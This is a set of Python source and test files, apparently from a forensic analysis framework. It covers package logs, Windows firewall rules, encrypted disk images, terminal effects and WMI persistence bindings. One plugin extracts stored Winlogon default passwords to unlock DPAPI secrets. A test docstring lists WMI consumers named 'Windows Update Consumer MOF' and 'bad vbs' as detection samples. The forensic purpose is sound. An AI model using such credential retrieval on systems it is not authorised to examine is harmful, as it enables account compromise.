                    package_name, version, arch, *_ = remainder
                    record.package_name = f"{package_name}-{version}:{arch}"
                elif operation == OperationTypes.Remove:
                    # 2022-12-16 12:57:50|remove |unzip|6.00-41.1|x86_64|root@ec9fa6d67dda|
                    package_name, version, arch, user, *_ = remainder
                    record.package_name = f"{package_name}-{version}:{arch}"
                    record.requested_by_user = user.split("@")[0]
                elif operation == OperationTypes.Other:
                    # 2022-12-16 12:56:23|command|root@ec9fa6d67dda|'zypper' 'install' 'unzip'|
                    user, command, *_ = remainder
                    record.requested_by_user = user.split("@")[0]
                    record.command = command.replace("'", "")

                yield record



from __future__ import annotations

from typing import TYPE_CHECKING

from dissect.target.exceptions import UnsupportedPluginError
from dissect.target.plugin import export
from dissect.target.plugins.os.windows.dpapi.keyprovider.defaultpassword.defaultpassword import (
    DefaultPasswordKeyProvider,
)

if TYPE_CHECKING:
    from collections.abc import Iterator


class WinlogonDefaultPasswordKeyProviderPlugin(DefaultPasswordKeyProvider):
    """Windows Winlogon DefaultPassword key provider plugin."""

    __namespace__ = "dpapi.keyprovider.defaultpassword.winlogon"

    def check_compatible(self) -> None:
        if not self.target.has_function("registry"):
            raise UnsupportedPluginError("Windows registry plugin not available on target")

    @export(output="yield")
    def keys(self) -> Iterator[tuple[str, str]]:
        """Yield Windows Winlogon DefaultPassword strings."""

        for record in self.target.credential.winlogon():
            yield self.__namespace__, record.password



from __future__ import annotations

import textwrap
from datetime import datetime, timezone
from io import BytesIO
from typing import TYPE_CHECKING

from dissect.target.helpers.regutil import VirtualHive, VirtualKey
from dissect.target.plugins.os.windows.firewall import WindowsFirewallPlugin

if TYPE_CHECKING:
    from dissect.target.filesystem import VirtualFilesystem
    from dissect.target.target import Target


def test_windows_firewall_rules(target_win_users: Target, hive_hklm: VirtualHive) -> None:
    """Test if we parse Windows Registry Firewall Rules correctly."""

    rules_name = "SYSTEM\\ControlSet001\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules"
    rules_key = VirtualKey(hive_hklm, rules_name)

    rules_key.add_value(
        "{some-uuid}",
        "v13.37|Action=Allow|Active=TRUE|Dir=Out|Protocol=17|LPort=1234|App=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe|Name=Microsoft Edge Example|Desc=Inbound example rule for Microsoft Edge|EmbedCtxt=Microsoft Edge|",  # noqa: E501
    )

    # See if we can parse dll table references
    rules_key.add_value(
        "Some-GPO-Rule-Name",
        "v13.37|Action=Allow|Active=FALSE|Dir=In|Protocol=148|Profile=Domain|LPort=5678|RA4=ExampleKeyword|RA6=AnotherExampleKeyword|App=%SystemRoot%\\system32\\svchost.exe|Svc=ExampleSvc|Name=@Example.dll,-12345|Desc=@Example.dll,-6789|EmbedCtxt=@Example.dll,-01234|",
    )

    # Malformed default Windows 11 rule
    rules_key.add_value(
        "DisplayEnhancementService Deny All Outbound",
        "V2.0|Action=Block|Dir=out|App=%SystemRoot%\\System32\\svchost.exe|Svc==DisplayEnhancementService|Name=Block outbound traffic from BFE|",  # noqa: E501
    )

    # Apparently we can use letters instead of numbers now too for protocol
    rules_key.add_value(
        "SearchProtocolHost-2",
        "V2.0|Action=Allow|Dir=Out|Protocol=tcp|rport=3268,389,563,993,995,80,443|App=%SystemRoot%\\system32\\SearchProtocolHost.exe|Name=Allow outbound traffic from SearchProtocolHost on specific ports|",  # noqa: E501
    )

    # Test port ranges
    rules_key.add_value(
        "WMPNetworkSvc-2",
        "V2.0|Action=Block|Dir=In|LPort=1-553,555-8553,8555-65535|Protocol=6|App=%PROGRAMFILES%\\Windows Media Player\\wmpnetwk.exe|Svc=WMPNetworkSvc|Name=Windows Media Player Network Sharing Service service hardening - Block any other incoming TCP traffic|",  # noqa: E501
    )

    hive_hklm.map_key(rules_name, rules_key)

    target_win_users.add_plugin(WindowsFirewallPlugin)
    records = list(target_win_users.firewall.rules())

    assert len(records) == 5

    assert records[0].key == "{some-uuid}"
    assert records[0].version == "v13.37"
    assert records[0].action == "ALLOW"
    assert records[0].active
    assert records[0].dir == "OUT"
    assert records[0].protocol == "UDP"
    assert records[0].lport == ["1234"]
    assert records[0].app == "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe"
    assert records[0].name == "Microsoft Edge Example"
    assert records[0].desc == "Inbound example rule for Microsoft Edge"
    assert records[0].embedctxt == "Microsoft Edge"
    assert (
        records[0].source
        == "HKLM\\SYSTEM\\ControlSet001\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules"
    )

    assert records[1].key == "Some-GPO-Rule-Name"
    assert records[1].version == "v13.37"
    assert records[1].action == "ALLOW"
    assert not records[1].active
    assert records[1].dir == "IN"
    assert records[1].protocol == "UNASSIGNED_148"  # test IntEnum._missing_
    assert records[1].profile == "Domain"
    assert records[1].lport == ["5678"]
    assert records[1].ra4 == "ExampleKeyword"
    assert records[1].ra6 == "AnotherExampleKeyword"
    assert records[1].app == "c:\\Windows\\system32\\svchost.exe"
    assert records[1].svc == "ExampleSvc"
    assert records[1].name == "@Example.dll,-12345"
    assert records[1].desc == "@Example.dll,-6789"
    assert records[1].embedctxt == "@Example.dll,-01234"
    assert (
        records[1].source
        == "HKLM\\SYSTEM\\ControlSet001\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules"
    )

    assert records[2].key == "DisplayEnhancementService Deny All Outbound"
    assert records[2].version == "V2.0"
    assert records[2].action == "BLOCK"
    assert records[2].dir == "OUT"
    assert records[2].app == "c:\\Windows\\System32\\svchost.exe"
    assert records[2].svc == "=DisplayEnhancementService"
    assert records[2].name == "Block outbound traffic from BFE"
    assert (
        records[2].source
        == "HKLM\\SYSTEM\\ControlSet001\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules"
    )

    assert records[3].key == "SearchProtocolHost-2"
    assert records[3].version == "V2.0"
    assert records[3].action == "ALLOW"
    assert records[3].dir == "OUT"
    assert records[3].protocol == "TCP"
    assert records[3].rport == ["3268", "389", "563", "993", "995", "80", "443"]
    assert records[3].app == "c:\\Windows\\system32\\SearchProtocolHost.exe"
    assert records[3].name == "Allow outbound traffic from SearchProtocolHost on specific ports"
    assert (
        records[3].source
        == "HKLM\\SYSTEM\\ControlSet001\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules"
    )

    assert records[4].key == "WMPNetworkSvc-2"
    assert records[4].version == "V2.0"
    assert records[4].action == "BLOCK"
    assert records[4].dir == "IN"
    assert records[4].lport == ["1-553", "555-8553", "8555-65535"]
    assert records[4].protocol == "TCP"
    assert records[4].app == "%PROGRAMFILES%\\Windows Media Player\\wmpnetwk.exe"
    assert records[4].svc == "WMPNetworkSvc"
    assert (
        records[4].name
        == "Windows Media Player Network Sharing Service service hardening - Block any other incoming TCP traffic"
    )
    assert (
        records[4].source
        == "HKLM\\SYSTEM\\ControlSet001\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules"
    )


def test_windows_firewall_logs(target_win: Target, fs_win: VirtualFilesystem) -> None:
    """Test if we parse Windows Firewall ``pfirewall.log`` files correctly."""

    buf = """\
    #Version: 1.5
    #Software: Microsoft Windows Firewall
    #Time Format: Local
    #Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path

    2022-01-01 13:37:00 ALLOW TCP 1.2.3.4 5.6.7.8 1234 5678 1337 - - - - - - - SEND
    2022-01-01 13:37:01 DROP UDP 1.2.3.4 5.6.7.8 12345 6789 0 - - - - - - - RECEIVE
    2022-01-01 13:37:02 DROP UDP 1.2.3.4 5.6.7.8 12345 6789 0 - - - - - - - RECEIVE
    """  # noqa: E501

    fs_win.map_file_fh("Windows/System32/LogFiles/Firewall/pfirewall.log", BytesIO(textwrap.dedent(buf).encode()))

    target_win.add_plugin(WindowsFirewallPlugin)

    records = list(target_win.firewall.logs())

    assert len(records) == 3

    assert records[0].ts == datetime(2022, 1, 1, 13, 37, 0, tzinfo=timezone.utc)
    assert records[0].action == "ALLOW"
    assert records[0].protocol == "TCP"
    assert records[0].src_ip == "1.2.3.4"
    assert records[0].dst_ip == "5.6.7.8"
    assert records[0].src_port == 1234
    assert records[0].dst_port == 5678
    assert records[0].size == 1337
    assert not records[0].tcpflags
    assert not records[0].tcpsyn
    assert not records[0].tcpack
    assert not records[0].tcpwin
    assert not records[0].icmptype
    assert not records[0].icmpcode
    assert not records[0].info
    assert records[0].path == "SEND"

    assert records[1].ts == datetime(2022, 1, 1, 13, 37, 1, tzinfo=timezone.utc)
    assert records[1].action == "DROP"
    assert records[1].protocol == "UDP"
    assert records[1].src_ip == "1.2.3.4"
    assert records[1].dst_ip == "5.6.7.8"
    assert records[1].src_port == 12345
    assert records[1].dst_port == 6789
    assert records[1].size == 0
    assert not records[1].tcpflags
    assert not records[1].tcpsyn
    assert not records[1].tcpack
    assert not records[1].tcpwin
    assert not records[1].icmptype
    assert not records[1].icmpcode
    assert not records[1].info
    assert records[1].path == "RECEIVE"



from __future__ import annotations

from typing import TYPE_CHECKING

import pytest

from dissect.target.exceptions import TargetError
from dissect.target.helpers import keychain
from dissect.target.loaders.ad1 import AD1Loader
from dissect.target.target import Target
from tests._utils import absolute_path

if TYPE_CHECKING:
    from collections.abc import Callable
    from pathlib import Path


@pytest.mark.parametrize(
    ("opener"),
    [
        pytest.param(Target.open, id="target-open"),
        pytest.param(lambda x: next(Target.open_all([x])), id="target-open-all"),
    ],
)
def test_target_open(opener: Callable[[str | Path], Target]) -> None:
    """Test that we correctly use ``AD1Loader`` when opening a ``Target``."""

    path = absolute_path("_data/filesystems/ad1/encrypted-small.ad1")

    with pytest.raises(TargetError):
        opener(path)

    keychain.register_wildcard_value("password")
    target = opener(path)

    assert isinstance(target._loader, AD1Loader)
    assert target.path == path
    assert target.fs.path("C:/Users/user/Desktop/Data").is_dir()



from __future__ import annotations

from typing import TYPE_CHECKING

import pytest

from dissect.target.plugins.os.default._os import DefaultOSPlugin

if TYPE_CHECKING:
    from dissect.target.target import Target


@pytest.mark.parametrize(
    ("method_name", "result"),
    [
        ("hostname", None),
        ("ips", []),
        ("version", None),
        ("os", "default"),
        ("architecture", None),
    ],
)
def test_default_plugin_property_methods(
    target_default: Target,
    method_name: str,
    result: None | str | list,
) -> str:
    os_plugin = DefaultOSPlugin(target_default)
    attr = getattr(os_plugin, method_name)
    assert attr == result



from __future__ import annotations

import os
import random
import string
import struct
import sys
import time
from array import array
from contextlib import contextmanager, redirect_stdout
from enum import Enum
from io import StringIO
from typing import TYPE_CHECKING

if TYPE_CHECKING:
    from collections.abc import Iterator

try:
    import fcntl
    import termios

    CAN_CYBER = True
except ImportError:
    CAN_CYBER = False

# fmt: off
NMS_MASK_TABLE = [
    "!", '"', "#", "$", "%", "&", "'", "(", ")", "*", "+", ",", "-", "~", ".", "/", ":",
    ";", "<", "=", ">", "?", "[", "\\", "]", "_", "{", "}", "A", "B", "C", "D", "E", "F",
    "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W",
    "X", "Y", "Z", "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n",
    "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z", "0", "1", "2", "3", "4",
    "5", "6", "7", "8", "9", "Ç", "ü", "é", "â", "ä", "à", "å", "ç", "ê", "ë", "è", "ï",
    "î", "ì", "Ä", "Å", "É", "æ", "Æ", "ô", "ö", "ò", "û", "ù", "ÿ", "Ö", "Ü", "¢", "£",
    "¥", "ƒ", "á", "í", "ó", "ú", "ñ", "Ñ", "ª", "º", "¿", "¬", "½", "¼", "¡", "«", "»",
    "α", "ß", "Γ", "π", "Σ", "σ", "µ", "τ", "Φ", "Θ", "Ω", "δ", "φ", "ε", "±", "÷", "°",  # noqa: RUF001
    "·", "²", "¶", "⌐", "₧", "░", "▒", "▓", "│", "┤", "╡", "╢", "╖", "╕", "╣", "║", "╗",
    "╝", "╜", "╛", "┐", "└", "┴", "┬", "├", "─", "┼", "╞", "╟", "╚", "╔", "╩", "╦", "╠",
    "═", "╬", "╧", "╨", "╤", "╧", "╙", "╘", "╒", "╓", "╫", "╪", "┘", "┌", "█", "▄", "▌",
    "▐", "▀", "∞", "∩", "≡", "≥", "≤", "⌠", "⌡", "≈", "∙", "√", "ⁿ", "■",
]
# fmt: on

NMS_TYPE_EFFECT_SPEED = 4 / 1000
NMS_JUMBLE_SECONDS = 1
NMS_JUMBLE_LOOP_SPEED = 35
NMS_REVEAL_SECONDS = 2
NMS_REVEAL_LOOP_SPEED = 50

MATRIX_CHARS = list(map(chr, range(0x20, 0x7F)))

MATRIX_MAX_SPEED = 5
MATRIX_MAX_CASCADES = 600
MATRIX_MAX_COLS = 20
MATRIX_FRAME_DELAY = 0.03
MATRIX_REVEAL_SECONDS = 4


class Color(Enum):
    """Cyber colors."""

    BLACK = 30
    RED = 31
    GREEN = 32
    YELLOW = 33
    BLUE = 34
    MAGENTA = 35
    CYAN = 36
    WHITE = 37


class CyberIO(StringIO):
    def __init__(self, color: Color | None = None, run_at_end: bool = False, **kwargs):
        self._color = color
        self._run_at_end = run_at_end
        self._kwargs = kwargs
        super().__init__()

    def write(self, s: str) -> int:
        if self._run_at_end:
            super().write(s)
        else:
            cyber_print(s, self._color, **self._kwargs)
        return len(s)


@contextmanager
def cyber(color: Color | None = Color.YELLOW, run_at_end: bool = False, **kwargs) -> Iterator[None]:
    stream = CyberIO(color, run_at_end, **kwargs)
    with redirect_stdout(stream):
        yield

    if run_at_end:
        cyber_print(stream.getvalue(), color, **kwargs)


def cyber_print(buf: str, color: Color | None = None, **kwargs) -> None:
    if not buf or buf == "\n":
        sys.__stdout__.write(buf)
        return

    if not CAN_CYBER:
        sys.__stdout__.write("you're not cybering hard enough\n")
        sys.__stdout__.write(buf)
        return

    if os.getenv("CYBER") == "💊":
        matrix(buf, color, **kwargs)
    else:
        nms(buf, color, **kwargs)


# https://github.com/bartobri/libnms
def nms(buf: str, color: Color | None = None, mask_space: bool = False, mask_indent: bool = True, **kwargs) -> None:
    orig_row, orig_col = (0, 0)
    with _set_terminal():
        max_rows, max_cols = _get_win_size()

        orig_row, _ = _get_cursor_pos()

        _cursor_hide()
        _cursor_move(orig_row, orig_col)

        characters, remaining, (orig_row, orig_col), _ = _get_character_info(
            buf, max_rows, max_cols, orig_row, orig_col
        )
        character_state = []

        try:
            is_indent = True
            # Write initial mask
            for char, has_ansi, end_ansi in characters:
                # Initialize the character state with a mask and reveal time
                reveal_time = random.randint(0, 100) if end_ansi else random.randint(100, NMS_REVEAL_SECONDS * 1000)

                mask = random.choice(NMS_MASK_TABLE)
                character_state.append((char, mask, reveal_time, has_ansi))

                if char != " ":
                    is_indent = False

                if (
                    ("\n" in char or "\r\n" in char)
                    or (not mask_space and char == " " and not is_indent)
                    or (not mask_indent and is_indent)
                ):
                    if "\n" in char:
                        is_indent = True
                    sys.__stdout__.write(char)
                    continue

                sys.__stdout__.write(mask)

                sys.__stdout__.flush()
                time.sleep(NMS_TYPE_EFFECT_SPEED)

            _clear_input()
            time.sleep(1)

            is_indent = True
            for _ in range((NMS_JUMBLE_SECONDS * 1000) // NMS_JUMBLE_LOOP_SPEED):
                _cursor_move(orig_row, orig_col)

                for char, _, _, _ in character_state:
                    if char != " ":
                        is_indent = False

                    if (
                        ("\n" in char or "\r\n" in char)
                        or (not mask_space and char == " ")
                        or (not mask_indent and is_indent)
                    ):
                        if "\n" in char:
                            is_indent = True
                        sys.__stdout__.write(char)
                        continue

                    sys.__stdout__.write(random.choice(NMS_MASK_TABLE))

                sys.__stdout__.flush()
                time.sleep(NMS_JUMBLE_LOOP_SPEED / 1000)

            revealed = False

            while not revealed:
                _cursor_move(orig_row, orig_col)
                revealed = True

                is_indent = True
                for i, (char, mask, time_remaining, has_ansi) in enumerate(character_state):
                    if char != " ":
                        is_indent = False

                    if (
                        ("\n" in char or "\r\n" in char)
                        or (not mask_space and char == " " and not is_indent)
                        or (not mask_indent and is_indent)
                    ):
                        if "\n" in char:
                            is_indent = True
                        sys.__stdout__.write(char)
                        continue

                    if time_remaining > 0:
                        if time_remaining < 500:
                            if random.randint(0, 3) == 0:
                                mask = random.choice(NMS_MASK_TABLE)
                        else:
                            if random.randint(0, 10) == 0:
                                mask = random.choice(NMS_MASK_TABLE)

                        sys.__stdout__.write(mask)
                        time_remaining -= NMS_REVEAL_LOOP_SPEED

                        revealed = False
                        character_state[i] = (char, mask, time_remaining, has_ansi)
                    else:
                        if has_ansi:
                            sys.__stdout__.write(char)
                        else:
                            if color:
                                _bold()
                                _foreground_color(color)

                            sys.__stdout__.write(char)

                            if color:
                                _clear_attr()

                sys.__stdout__.flush()
                time.sleep(NMS_REVEAL_LOOP_SPEED / 1000)

            _clear_input()
            _cursor_show()

            if remaining:
                _write_remaining(remaining, color)
        except KeyboardInterrupt:
            _clear_screen()
        finally:
            _clear_attr()
            _cursor_show()


# https://github.com/jsbueno/terminal_matrix
def matrix(buf: str, color: Color | None = None, **kwargs) -> None:
    orig_row, orig_col = (0, 0)
    with _set_terminal():
        max_rows, max_cols = _get_win_size()

        orig_row, _ = _get_cursor_pos()

        _cursor_hide()
        _clear_screen()
        _cursor_move(orig_row, orig_col)

        characters, remaining, (orig_row, orig_col), (end_row, _) = _get_character_info(
            buf, max_rows, max_cols, orig_row, orig_col
        )
        reveal_cols = [[" " for _ in range(max_rows + 1)] for _ in range(max_cols)]

        cur_ansi = ""
        row = column = 0
        for char, has_ansi, end_ansi in characters:
            if has_ansi:
                if end_ansi:
                    cur_ansi += char[:-5][:-4]
                else:
                    cur_ansi += char[:-1]
            elif color:
                cur_ansi = f"\033[1m\033[0;{color.value}m"

            if cur_ansi:
                char = cur_ansi + char + "\033[0m"
                if end_ansi:
                    cur_ansi = ""

            if "\n" in char or "\r\n" in char:
                char = " " + char

            reveal_cols[column][row] = char

            if "\n" in char or "\r\n" in char or column == max_cols:
                row += 1
                column = 0
            else:
                column += 1

        time_remaining = MATRIX_REVEAL_SECONDS

        try:
            cascading = set()
            remaining_columns = set(range(1, max_cols))
            occupied_columns = set()

            while True:
                if time_remaining > 0:
                    while True:
                        if random.randrange(MATRIX_MAX_CASCADES + 1) > len(cascading):
                            start_col = random.randrange(1, max_cols)
                            for i in range(random.randrange(MATRIX_MAX_COLS)):
                                col = (start_col + i) % (max_cols + 1)
                                if col != 0 and col not in occupied_columns:
                                    cascading.add(_cascade(col, max_rows + 1, reveal_cols[col - 1]))
                                    occupied_columns.add(col)
                                    remaining_columns.discard(col)
                        break
                elif remaining_columns:
                    while remaining_columns:
                        col = remaining_columns.pop()
                        cascading.add(_cascade(col, max_rows, reveal_cols[col - 1]))

                stopped = set()
                for c in cascading:
                    try:
                        next(c)
                    except StopIteration:  # noqa: PERF203
                        stopped.add(c)

                sys.__stdout__.flush()

                cascading.difference_update(stopped)
                time_remaining -= MATRIX_FRAME_DELAY
                time.sleep(MATRIX_FRAME_DELAY)

                if not cascading:
                    break

            _cursor_move(end_row - orig_row + 1, 0)
            if remaining:
                _write_remaining(remaining, color)
        except KeyboardInterrupt:
            _clear_screen()
        finally:
            _clear_attr()
            _cursor_show()


def _cascade(col: int, max_rows: int, reveal_row: list[str]) -> Iterator:
    speed = random.randrange(1, MATRIX_MAX_SPEED)
    erase_speed = random.randrange(1, MATRIX_MAX_SPEED)

    if speed < erase_speed:
        speed, erase_speed = erase_speed, speed

    row = counter = erase_counter = 0
    old_row = erase_row = -1
    erasing = False
    bright = True

    limit = max(0, max_rows - (random.paretovariate(1.16) - 1) * (max_rows // 2))

    while True:
        counter, row = _update_row(speed, counter, row)
        if random.randrange(10 * speed) < 1:
            bright = False

        if row > 1 and row <= limit and old_row != row:
            _print_at(random.choice(MATRIX_CHARS), row - 1, col, Color.GREEN, bright)

        if row < limit:
            _print_at(random.choice(MATRIX_CHARS), row, col, Color.WHITE, bright)

        if not erasing:
            erasing = random.randrange(row + 1) > (max_rows / 2)
            erase_row = 0
        else:
            erase_counter, erase_row = _update_row(erase_speed, erase_counter, erase_row)

            for i in range(1, erase_row):
                _print_at(reveal_row[i - 1], i, col)

        yield None

        if erase_row >= max_rows:
            for i in range(1, max_rows):
                _print_at(reveal_row[i - 1], i, col)
            break


def _update_row(speed: int, counter: int, row: int) -> tuple[int, int]:
    counter += 1
    if counter >= speed:
        row += 1
        counter = 0
    return counter, row


def _get_character_info(
    buf: str, max_rows: int, max_cols: int, orig_row: int, orig_col: int
) -> tuple[list[tuple[str, bool, bool]], str, tuple[int, int], tuple[int, int]]:
    cur_row, cur_col = orig_row, orig_col

    characters = []
    has_ansi = False
    end_ansi = False

    i = 0
    while i < len(buf):
        if cur_row - orig_row >= max_rows - 1:
            break

        if end_ansi:
            has_ansi = False
            end_ansi = False

        char = buf[i]
        i += 1

        if char == "\033":
            has_ansi = True

            while i < len(buf):
                char += buf[i]
                i += 1

                if char[-1] in string.ascii_letters and i < len(buf):
                    # First letter is the end of the ANSI code, read one more
                    char += buf[i]
                    i += 1

                    if char[-1] != "\033":
                        # The real end, now we have a char with ANSI codes prepended to it
                        break

        if (ansi_reset := buf[i : i + 4]) == "\033[0m":
            char += ansi_reset
            i += 4
            end_ansi = True

        if char == "\r" and i < len(buf) and buf[i] == "\n":
            char += buf[i]
            i += 1

        characters.append((char, has_ansi, end_ansi))

        if ("\n" in char or "\r\n" in char) or cur_col > max_cols:
            has_ansi = False
            cur_col = 0
            cur_row += 1
            if cur_row == max_rows + 1 and orig_row > 0:
                orig_row -= 1
                cur_row -= 1

    remaining = buf[i:]

    return characters, remaining, (orig_row, orig_col), (cur_row, cur_col)


def _write_remaining(remaining: str, color: Color | None) -> None:
    time.sleep(0.5)

    if color and "\033" not in remaining:
        _bold()
        _foreground_color(color)

    sys.__stdout__.write(remaining)

    if color and "\033" not in remaining:
        _clear_attr()


@contextmanager
def _set_terminal() -> Iterator[None]:
    attr = termios.tcgetattr(sys.__stdin__)

    new = attr[:]
    new[3] &= ~termios.ICANON & ~termios.ECHO

    termios.tcsetattr(sys.__stdin__, termios.TCSAFLUSH, new)

    try:
        yield
    finally:
        termios.tcsetattr(sys.__stdin__, termios.TCSANOW, attr)


def _get_win_size() -> tuple[int, int]:
    packed = fcntl.ioctl(sys.__stdin__.buffer, termios.TIOCGWINSZ, struct.pack("HHHH", 0, 0, 0, 0))
    rows, cols, _, _ = struct.unpack("HHHH", packed)
    return rows, cols


def _get_cursor_pos() -> int:
    sys.__stdout__.write("\033[6n")
    sys.__stdout__.flush()

    buf = ""
    while (c := sys.__stdin__.read(1)) != "R":
        if c in ("\033", "["):
            continue

        buf += c

    row, col = map(int, buf.split(";"))

    return row, col


def _print_at(s: str, row: int, col: int, color: Color | None = None, bright: bool = False) -> None:
    _cursor_move(row, col)
    if color:
        _foreground_color(color, bright)
    sys.__stdout__.write(s)
    if color:
        _clear_attr()


def _clear_input() -> None:
    i = array("i", [0])
    fcntl.ioctl(sys.__stdin__.buffer, termios.FIONREAD, i)
    sys.__stdin__.buffer.read(i[0])


def _cursor_move(row: int, col: int) -> None:
    sys.__stdout__.write(f"\033[{row};{col}H")
    sys.__stdout__.flush()


def _bold() -> None:
    sys.__stdout__.write("\033[1m")
    sys.__stdout__.flush()


def _foreground_color(c: Color, bright: bool = False) -> None:
    sys.__stdout__.write(f"\033[{'1' if bright else '0'};{c.value}m")
    sys.__stdout__.flush()


def _clear_attr() -> None:
    sys.__stdout__.write("\033[0m")
    sys.__stdout__.flush()


def _clear_screen() -> None:
    sys.__stdout__.write("\033[2J")
    sys.__stdout__.flush()


def _cursor_hide() -> None:
    sys.__stdout__.write("\033[?25l")
    sys.__stdout__.flush()


def _cursor_show() -> None:
    sys.__stdout__.write("\033[?25h")
    sys.__stdout__.flush()



import pathlib

import pytest

from dissect.target.filesystem import VirtualFilesystem
from dissect.target.plugins.os.unix.linux._os import LinuxPlugin
from dissect.target.target import Target
from tests.conftest import make_os_target


@pytest.fixture
def target_linux_proc_sys(tmp_path: pathlib.Path) -> Target:
    root_fs = VirtualFilesystem()
    root_fs.makedirs("/proc/sys")
    root_fs.makedirs("/sys/module")
    return make_os_target(tmp_path, LinuxPlugin, root_fs)


@pytest.fixture
def target_linux_windows_folder(tmp_path: pathlib.Path) -> Target:
    root_fs = VirtualFilesystem()
    root_fs.makedirs("/windows")
    root_fs.makedirs("/var")
    root_fs.makedirs("/etc")
    root_fs.makedirs("/opt")

    return make_os_target(tmp_path, LinuxPlugin, root_fs)


def test_linux_os(target_linux: Target) -> None:
    target_linux.add_plugin(LinuxPlugin)

    assert target_linux.os == "linux"


def test_linux_os_windows_folder(target_linux_windows_folder: Target) -> None:
    target_linux_windows_folder.add_plugin(LinuxPlugin)
    assert target_linux_windows_folder._os_plugin.detect(target_linux_windows_folder) is not None
    assert target_linux_windows_folder.os == "linux"


def test_linux_os_proc_sys(target_linux_proc_sys: Target) -> None:
    assert target_linux_proc_sys._os_plugin.detect(target_linux_proc_sys) is not None
    assert target_linux_proc_sys.os == "linux"



from __future__ import annotations

from typing import TYPE_CHECKING

from dissect.target.plugins.os.windows import cim
from dissect.target.plugins.os.windows.cim import (
    ActiveScriptEventConsumerRecord,
    CommandLineEventConsumerRecord,
)
from dissect.target.target import Target
from tests._utils import absolute_path

if TYPE_CHECKING:
    from dissect.target.filesystem import VirtualFilesystem


def test_cim_plugin(target_win: Target, fs_win: VirtualFilesystem) -> None:
    """Test the CIM plugin for extracting WMI Consumer Bindings."""
    wbem_repository = absolute_path("_data/plugins/os/windows/cim/default-namespace")
    fs_win.map_dir("Windows/System32/wbem/repository", wbem_repository)

    target_win.add_plugin(cim.CimPlugin)
    consumer_records = list(target_win.cim.consumerbindings())
    assert len(consumer_records) == 3
    assert len([r for r in consumer_records if type(r) == CommandLineEventConsumerRecord.recordType]) == 1  # noqa: E721
    assert len([r for r in consumer_records if type(r) == ActiveScriptEventConsumerRecord.recordType]) == 2  # noqa: E721
    # Ensure associated filter query was correctly found for all
    assert len([record for record in target_win.cim() if record.filter_query]) == 3


def test_cim_direct_mode() -> None:
    data_path = absolute_path("_data/plugins/os/windows/cim/default-namespace")
    target = Target.open_direct([data_path])
    records = list(target.cim.consumerbindings())

    assert len(records) == 3


r"""
Result of the WMI query on the system used to generate the test data

## __FilterToConsumerBinding
```
 Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding
__GENUS                 : 2
__CLASS                 : __FilterToConsumerBinding
__SUPERCLASS            : __IndicationRelated
__DYNASTY               : __SystemClass
__RELPATH               : __FilterToConsumerBinding.Consumer="\\\\.\\root\\subscription:CommandLineEventConsumer.Name=\"Windows Update Consumer MOF\"",Filter="\\\\.\\root\\subscription:__EventFilter.Name=\"Windows Update Event MOF\""
__PROPERTY_COUNT        : 7
__DERIVATION            : {__IndicationRelated, __SystemClass}
__SERVER                : DESKTOP-O8964S4
__NAMESPACE             : ROOT\Subscription
__PATH                  : \\DESKTOP-O8964S4\ROOT\Subscription:__FilterToConsumerBinding.Consumer="\\\\.\\root\\subscription:CommandLineEventConsumer.Name=\"Windows Update Consumer MOF\"",Filter="\\\\.\\root\\subscription:__EventFilter.Name=\"Windows Update Event MOF\""
Consumer                : \\.\root\subscription:CommandLineEventConsumer.Name="Windows Update Consumer MOF"
CreatorSID              : {1, 5, 0, 0...}
DeliverSynchronously    : False
DeliveryQoS             :
Filter                  : \\.\root\subscription:__EventFilter.Name="Windows Update Event MOF"
MaintainSecurityContext : False
SlowDownProviders       : False
PSComputerName          : DESKTOP-O8964S4

__GENUS                 : 2
__CLASS                 : __FilterToConsumerBinding
__SUPERCLASS            : __IndicationRelated
__DYNASTY               : __SystemClass
__RELPATH               : __FilterToConsumerBinding.Consumer="NTEventLogEventConsumer.Name=\"SCM Event Log Consumer\"",Filter="__EventFilter.Name=\"SCM Event Log Filter\""
__PROPERTY_COUNT        : 7
__DERIVATION            : {__IndicationRelated, __SystemClass}
__SERVER                : DESKTOP-O8964S4
__NAMESPACE             : ROOT\Subscription
__PATH                  : \\DESKTOP-O8964S4\ROOT\Subscription:__FilterToConsumerBinding.Consumer="NTEventLogEventConsumer.Name=\"SCM Event Log Consumer\"",Filter="__EventFilter.Name=\"SCM Event Log Filter\""
Consumer                : NTEventLogEventConsumer.Name="SCM Event Log Consumer"
CreatorSID              : {1, 2, 0, 0...}
DeliverSynchronously    : False
DeliveryQoS             :
Filter                  : __EventFilter.Name="SCM Event Log Filter"
MaintainSecurityContext : False
SlowDownProviders       : False
PSComputerName          : DESKTOP-O8964S4

__GENUS                 : 2
__CLASS                 : __FilterToConsumerBinding
__SUPERCLASS            : __IndicationRelated
__DYNASTY               : __SystemClass
__RELPATH               : __FilterToConsumerBinding.Consumer="\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name=\"bad vbs\"",Filter="\\\\.\\root\\subscription:__EventFilter.Name=\"Windows\\\" Update Event MOF\""
__PROPERTY_COUNT        : 7
__DERIVATION            : {__IndicationRelated, __SystemClass}
__SERVER                : DESKTOP-O8964S4
__NAMESPACE             : ROOT\Subscription
__PATH                  : \\DESKTOP-O8964S4\ROOT\Subscription:__FilterToConsumerBinding.Consumer="\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name=\"bad vbs\"",Filter="\\\\.\\root\\subscription:__EventFilter.Name=\"Windows\\\" Update Event MOF\""
Consumer                : \\.\root\subscription:ActiveScriptEventConsumer.Name="bad vbs"
CreatorSID              : {1, 5, 0, 0...}
DeliverSynchronously    : False
DeliveryQoS             :
Filter                  : \\.\root\subscription:__EventFilter.Name="Windows\" Update Event MOF"
MaintainSecurityContext : False
SlowDownProviders       : False
PSComputerName          : DESKTOP-O8964S4

__GENUS                 : 2
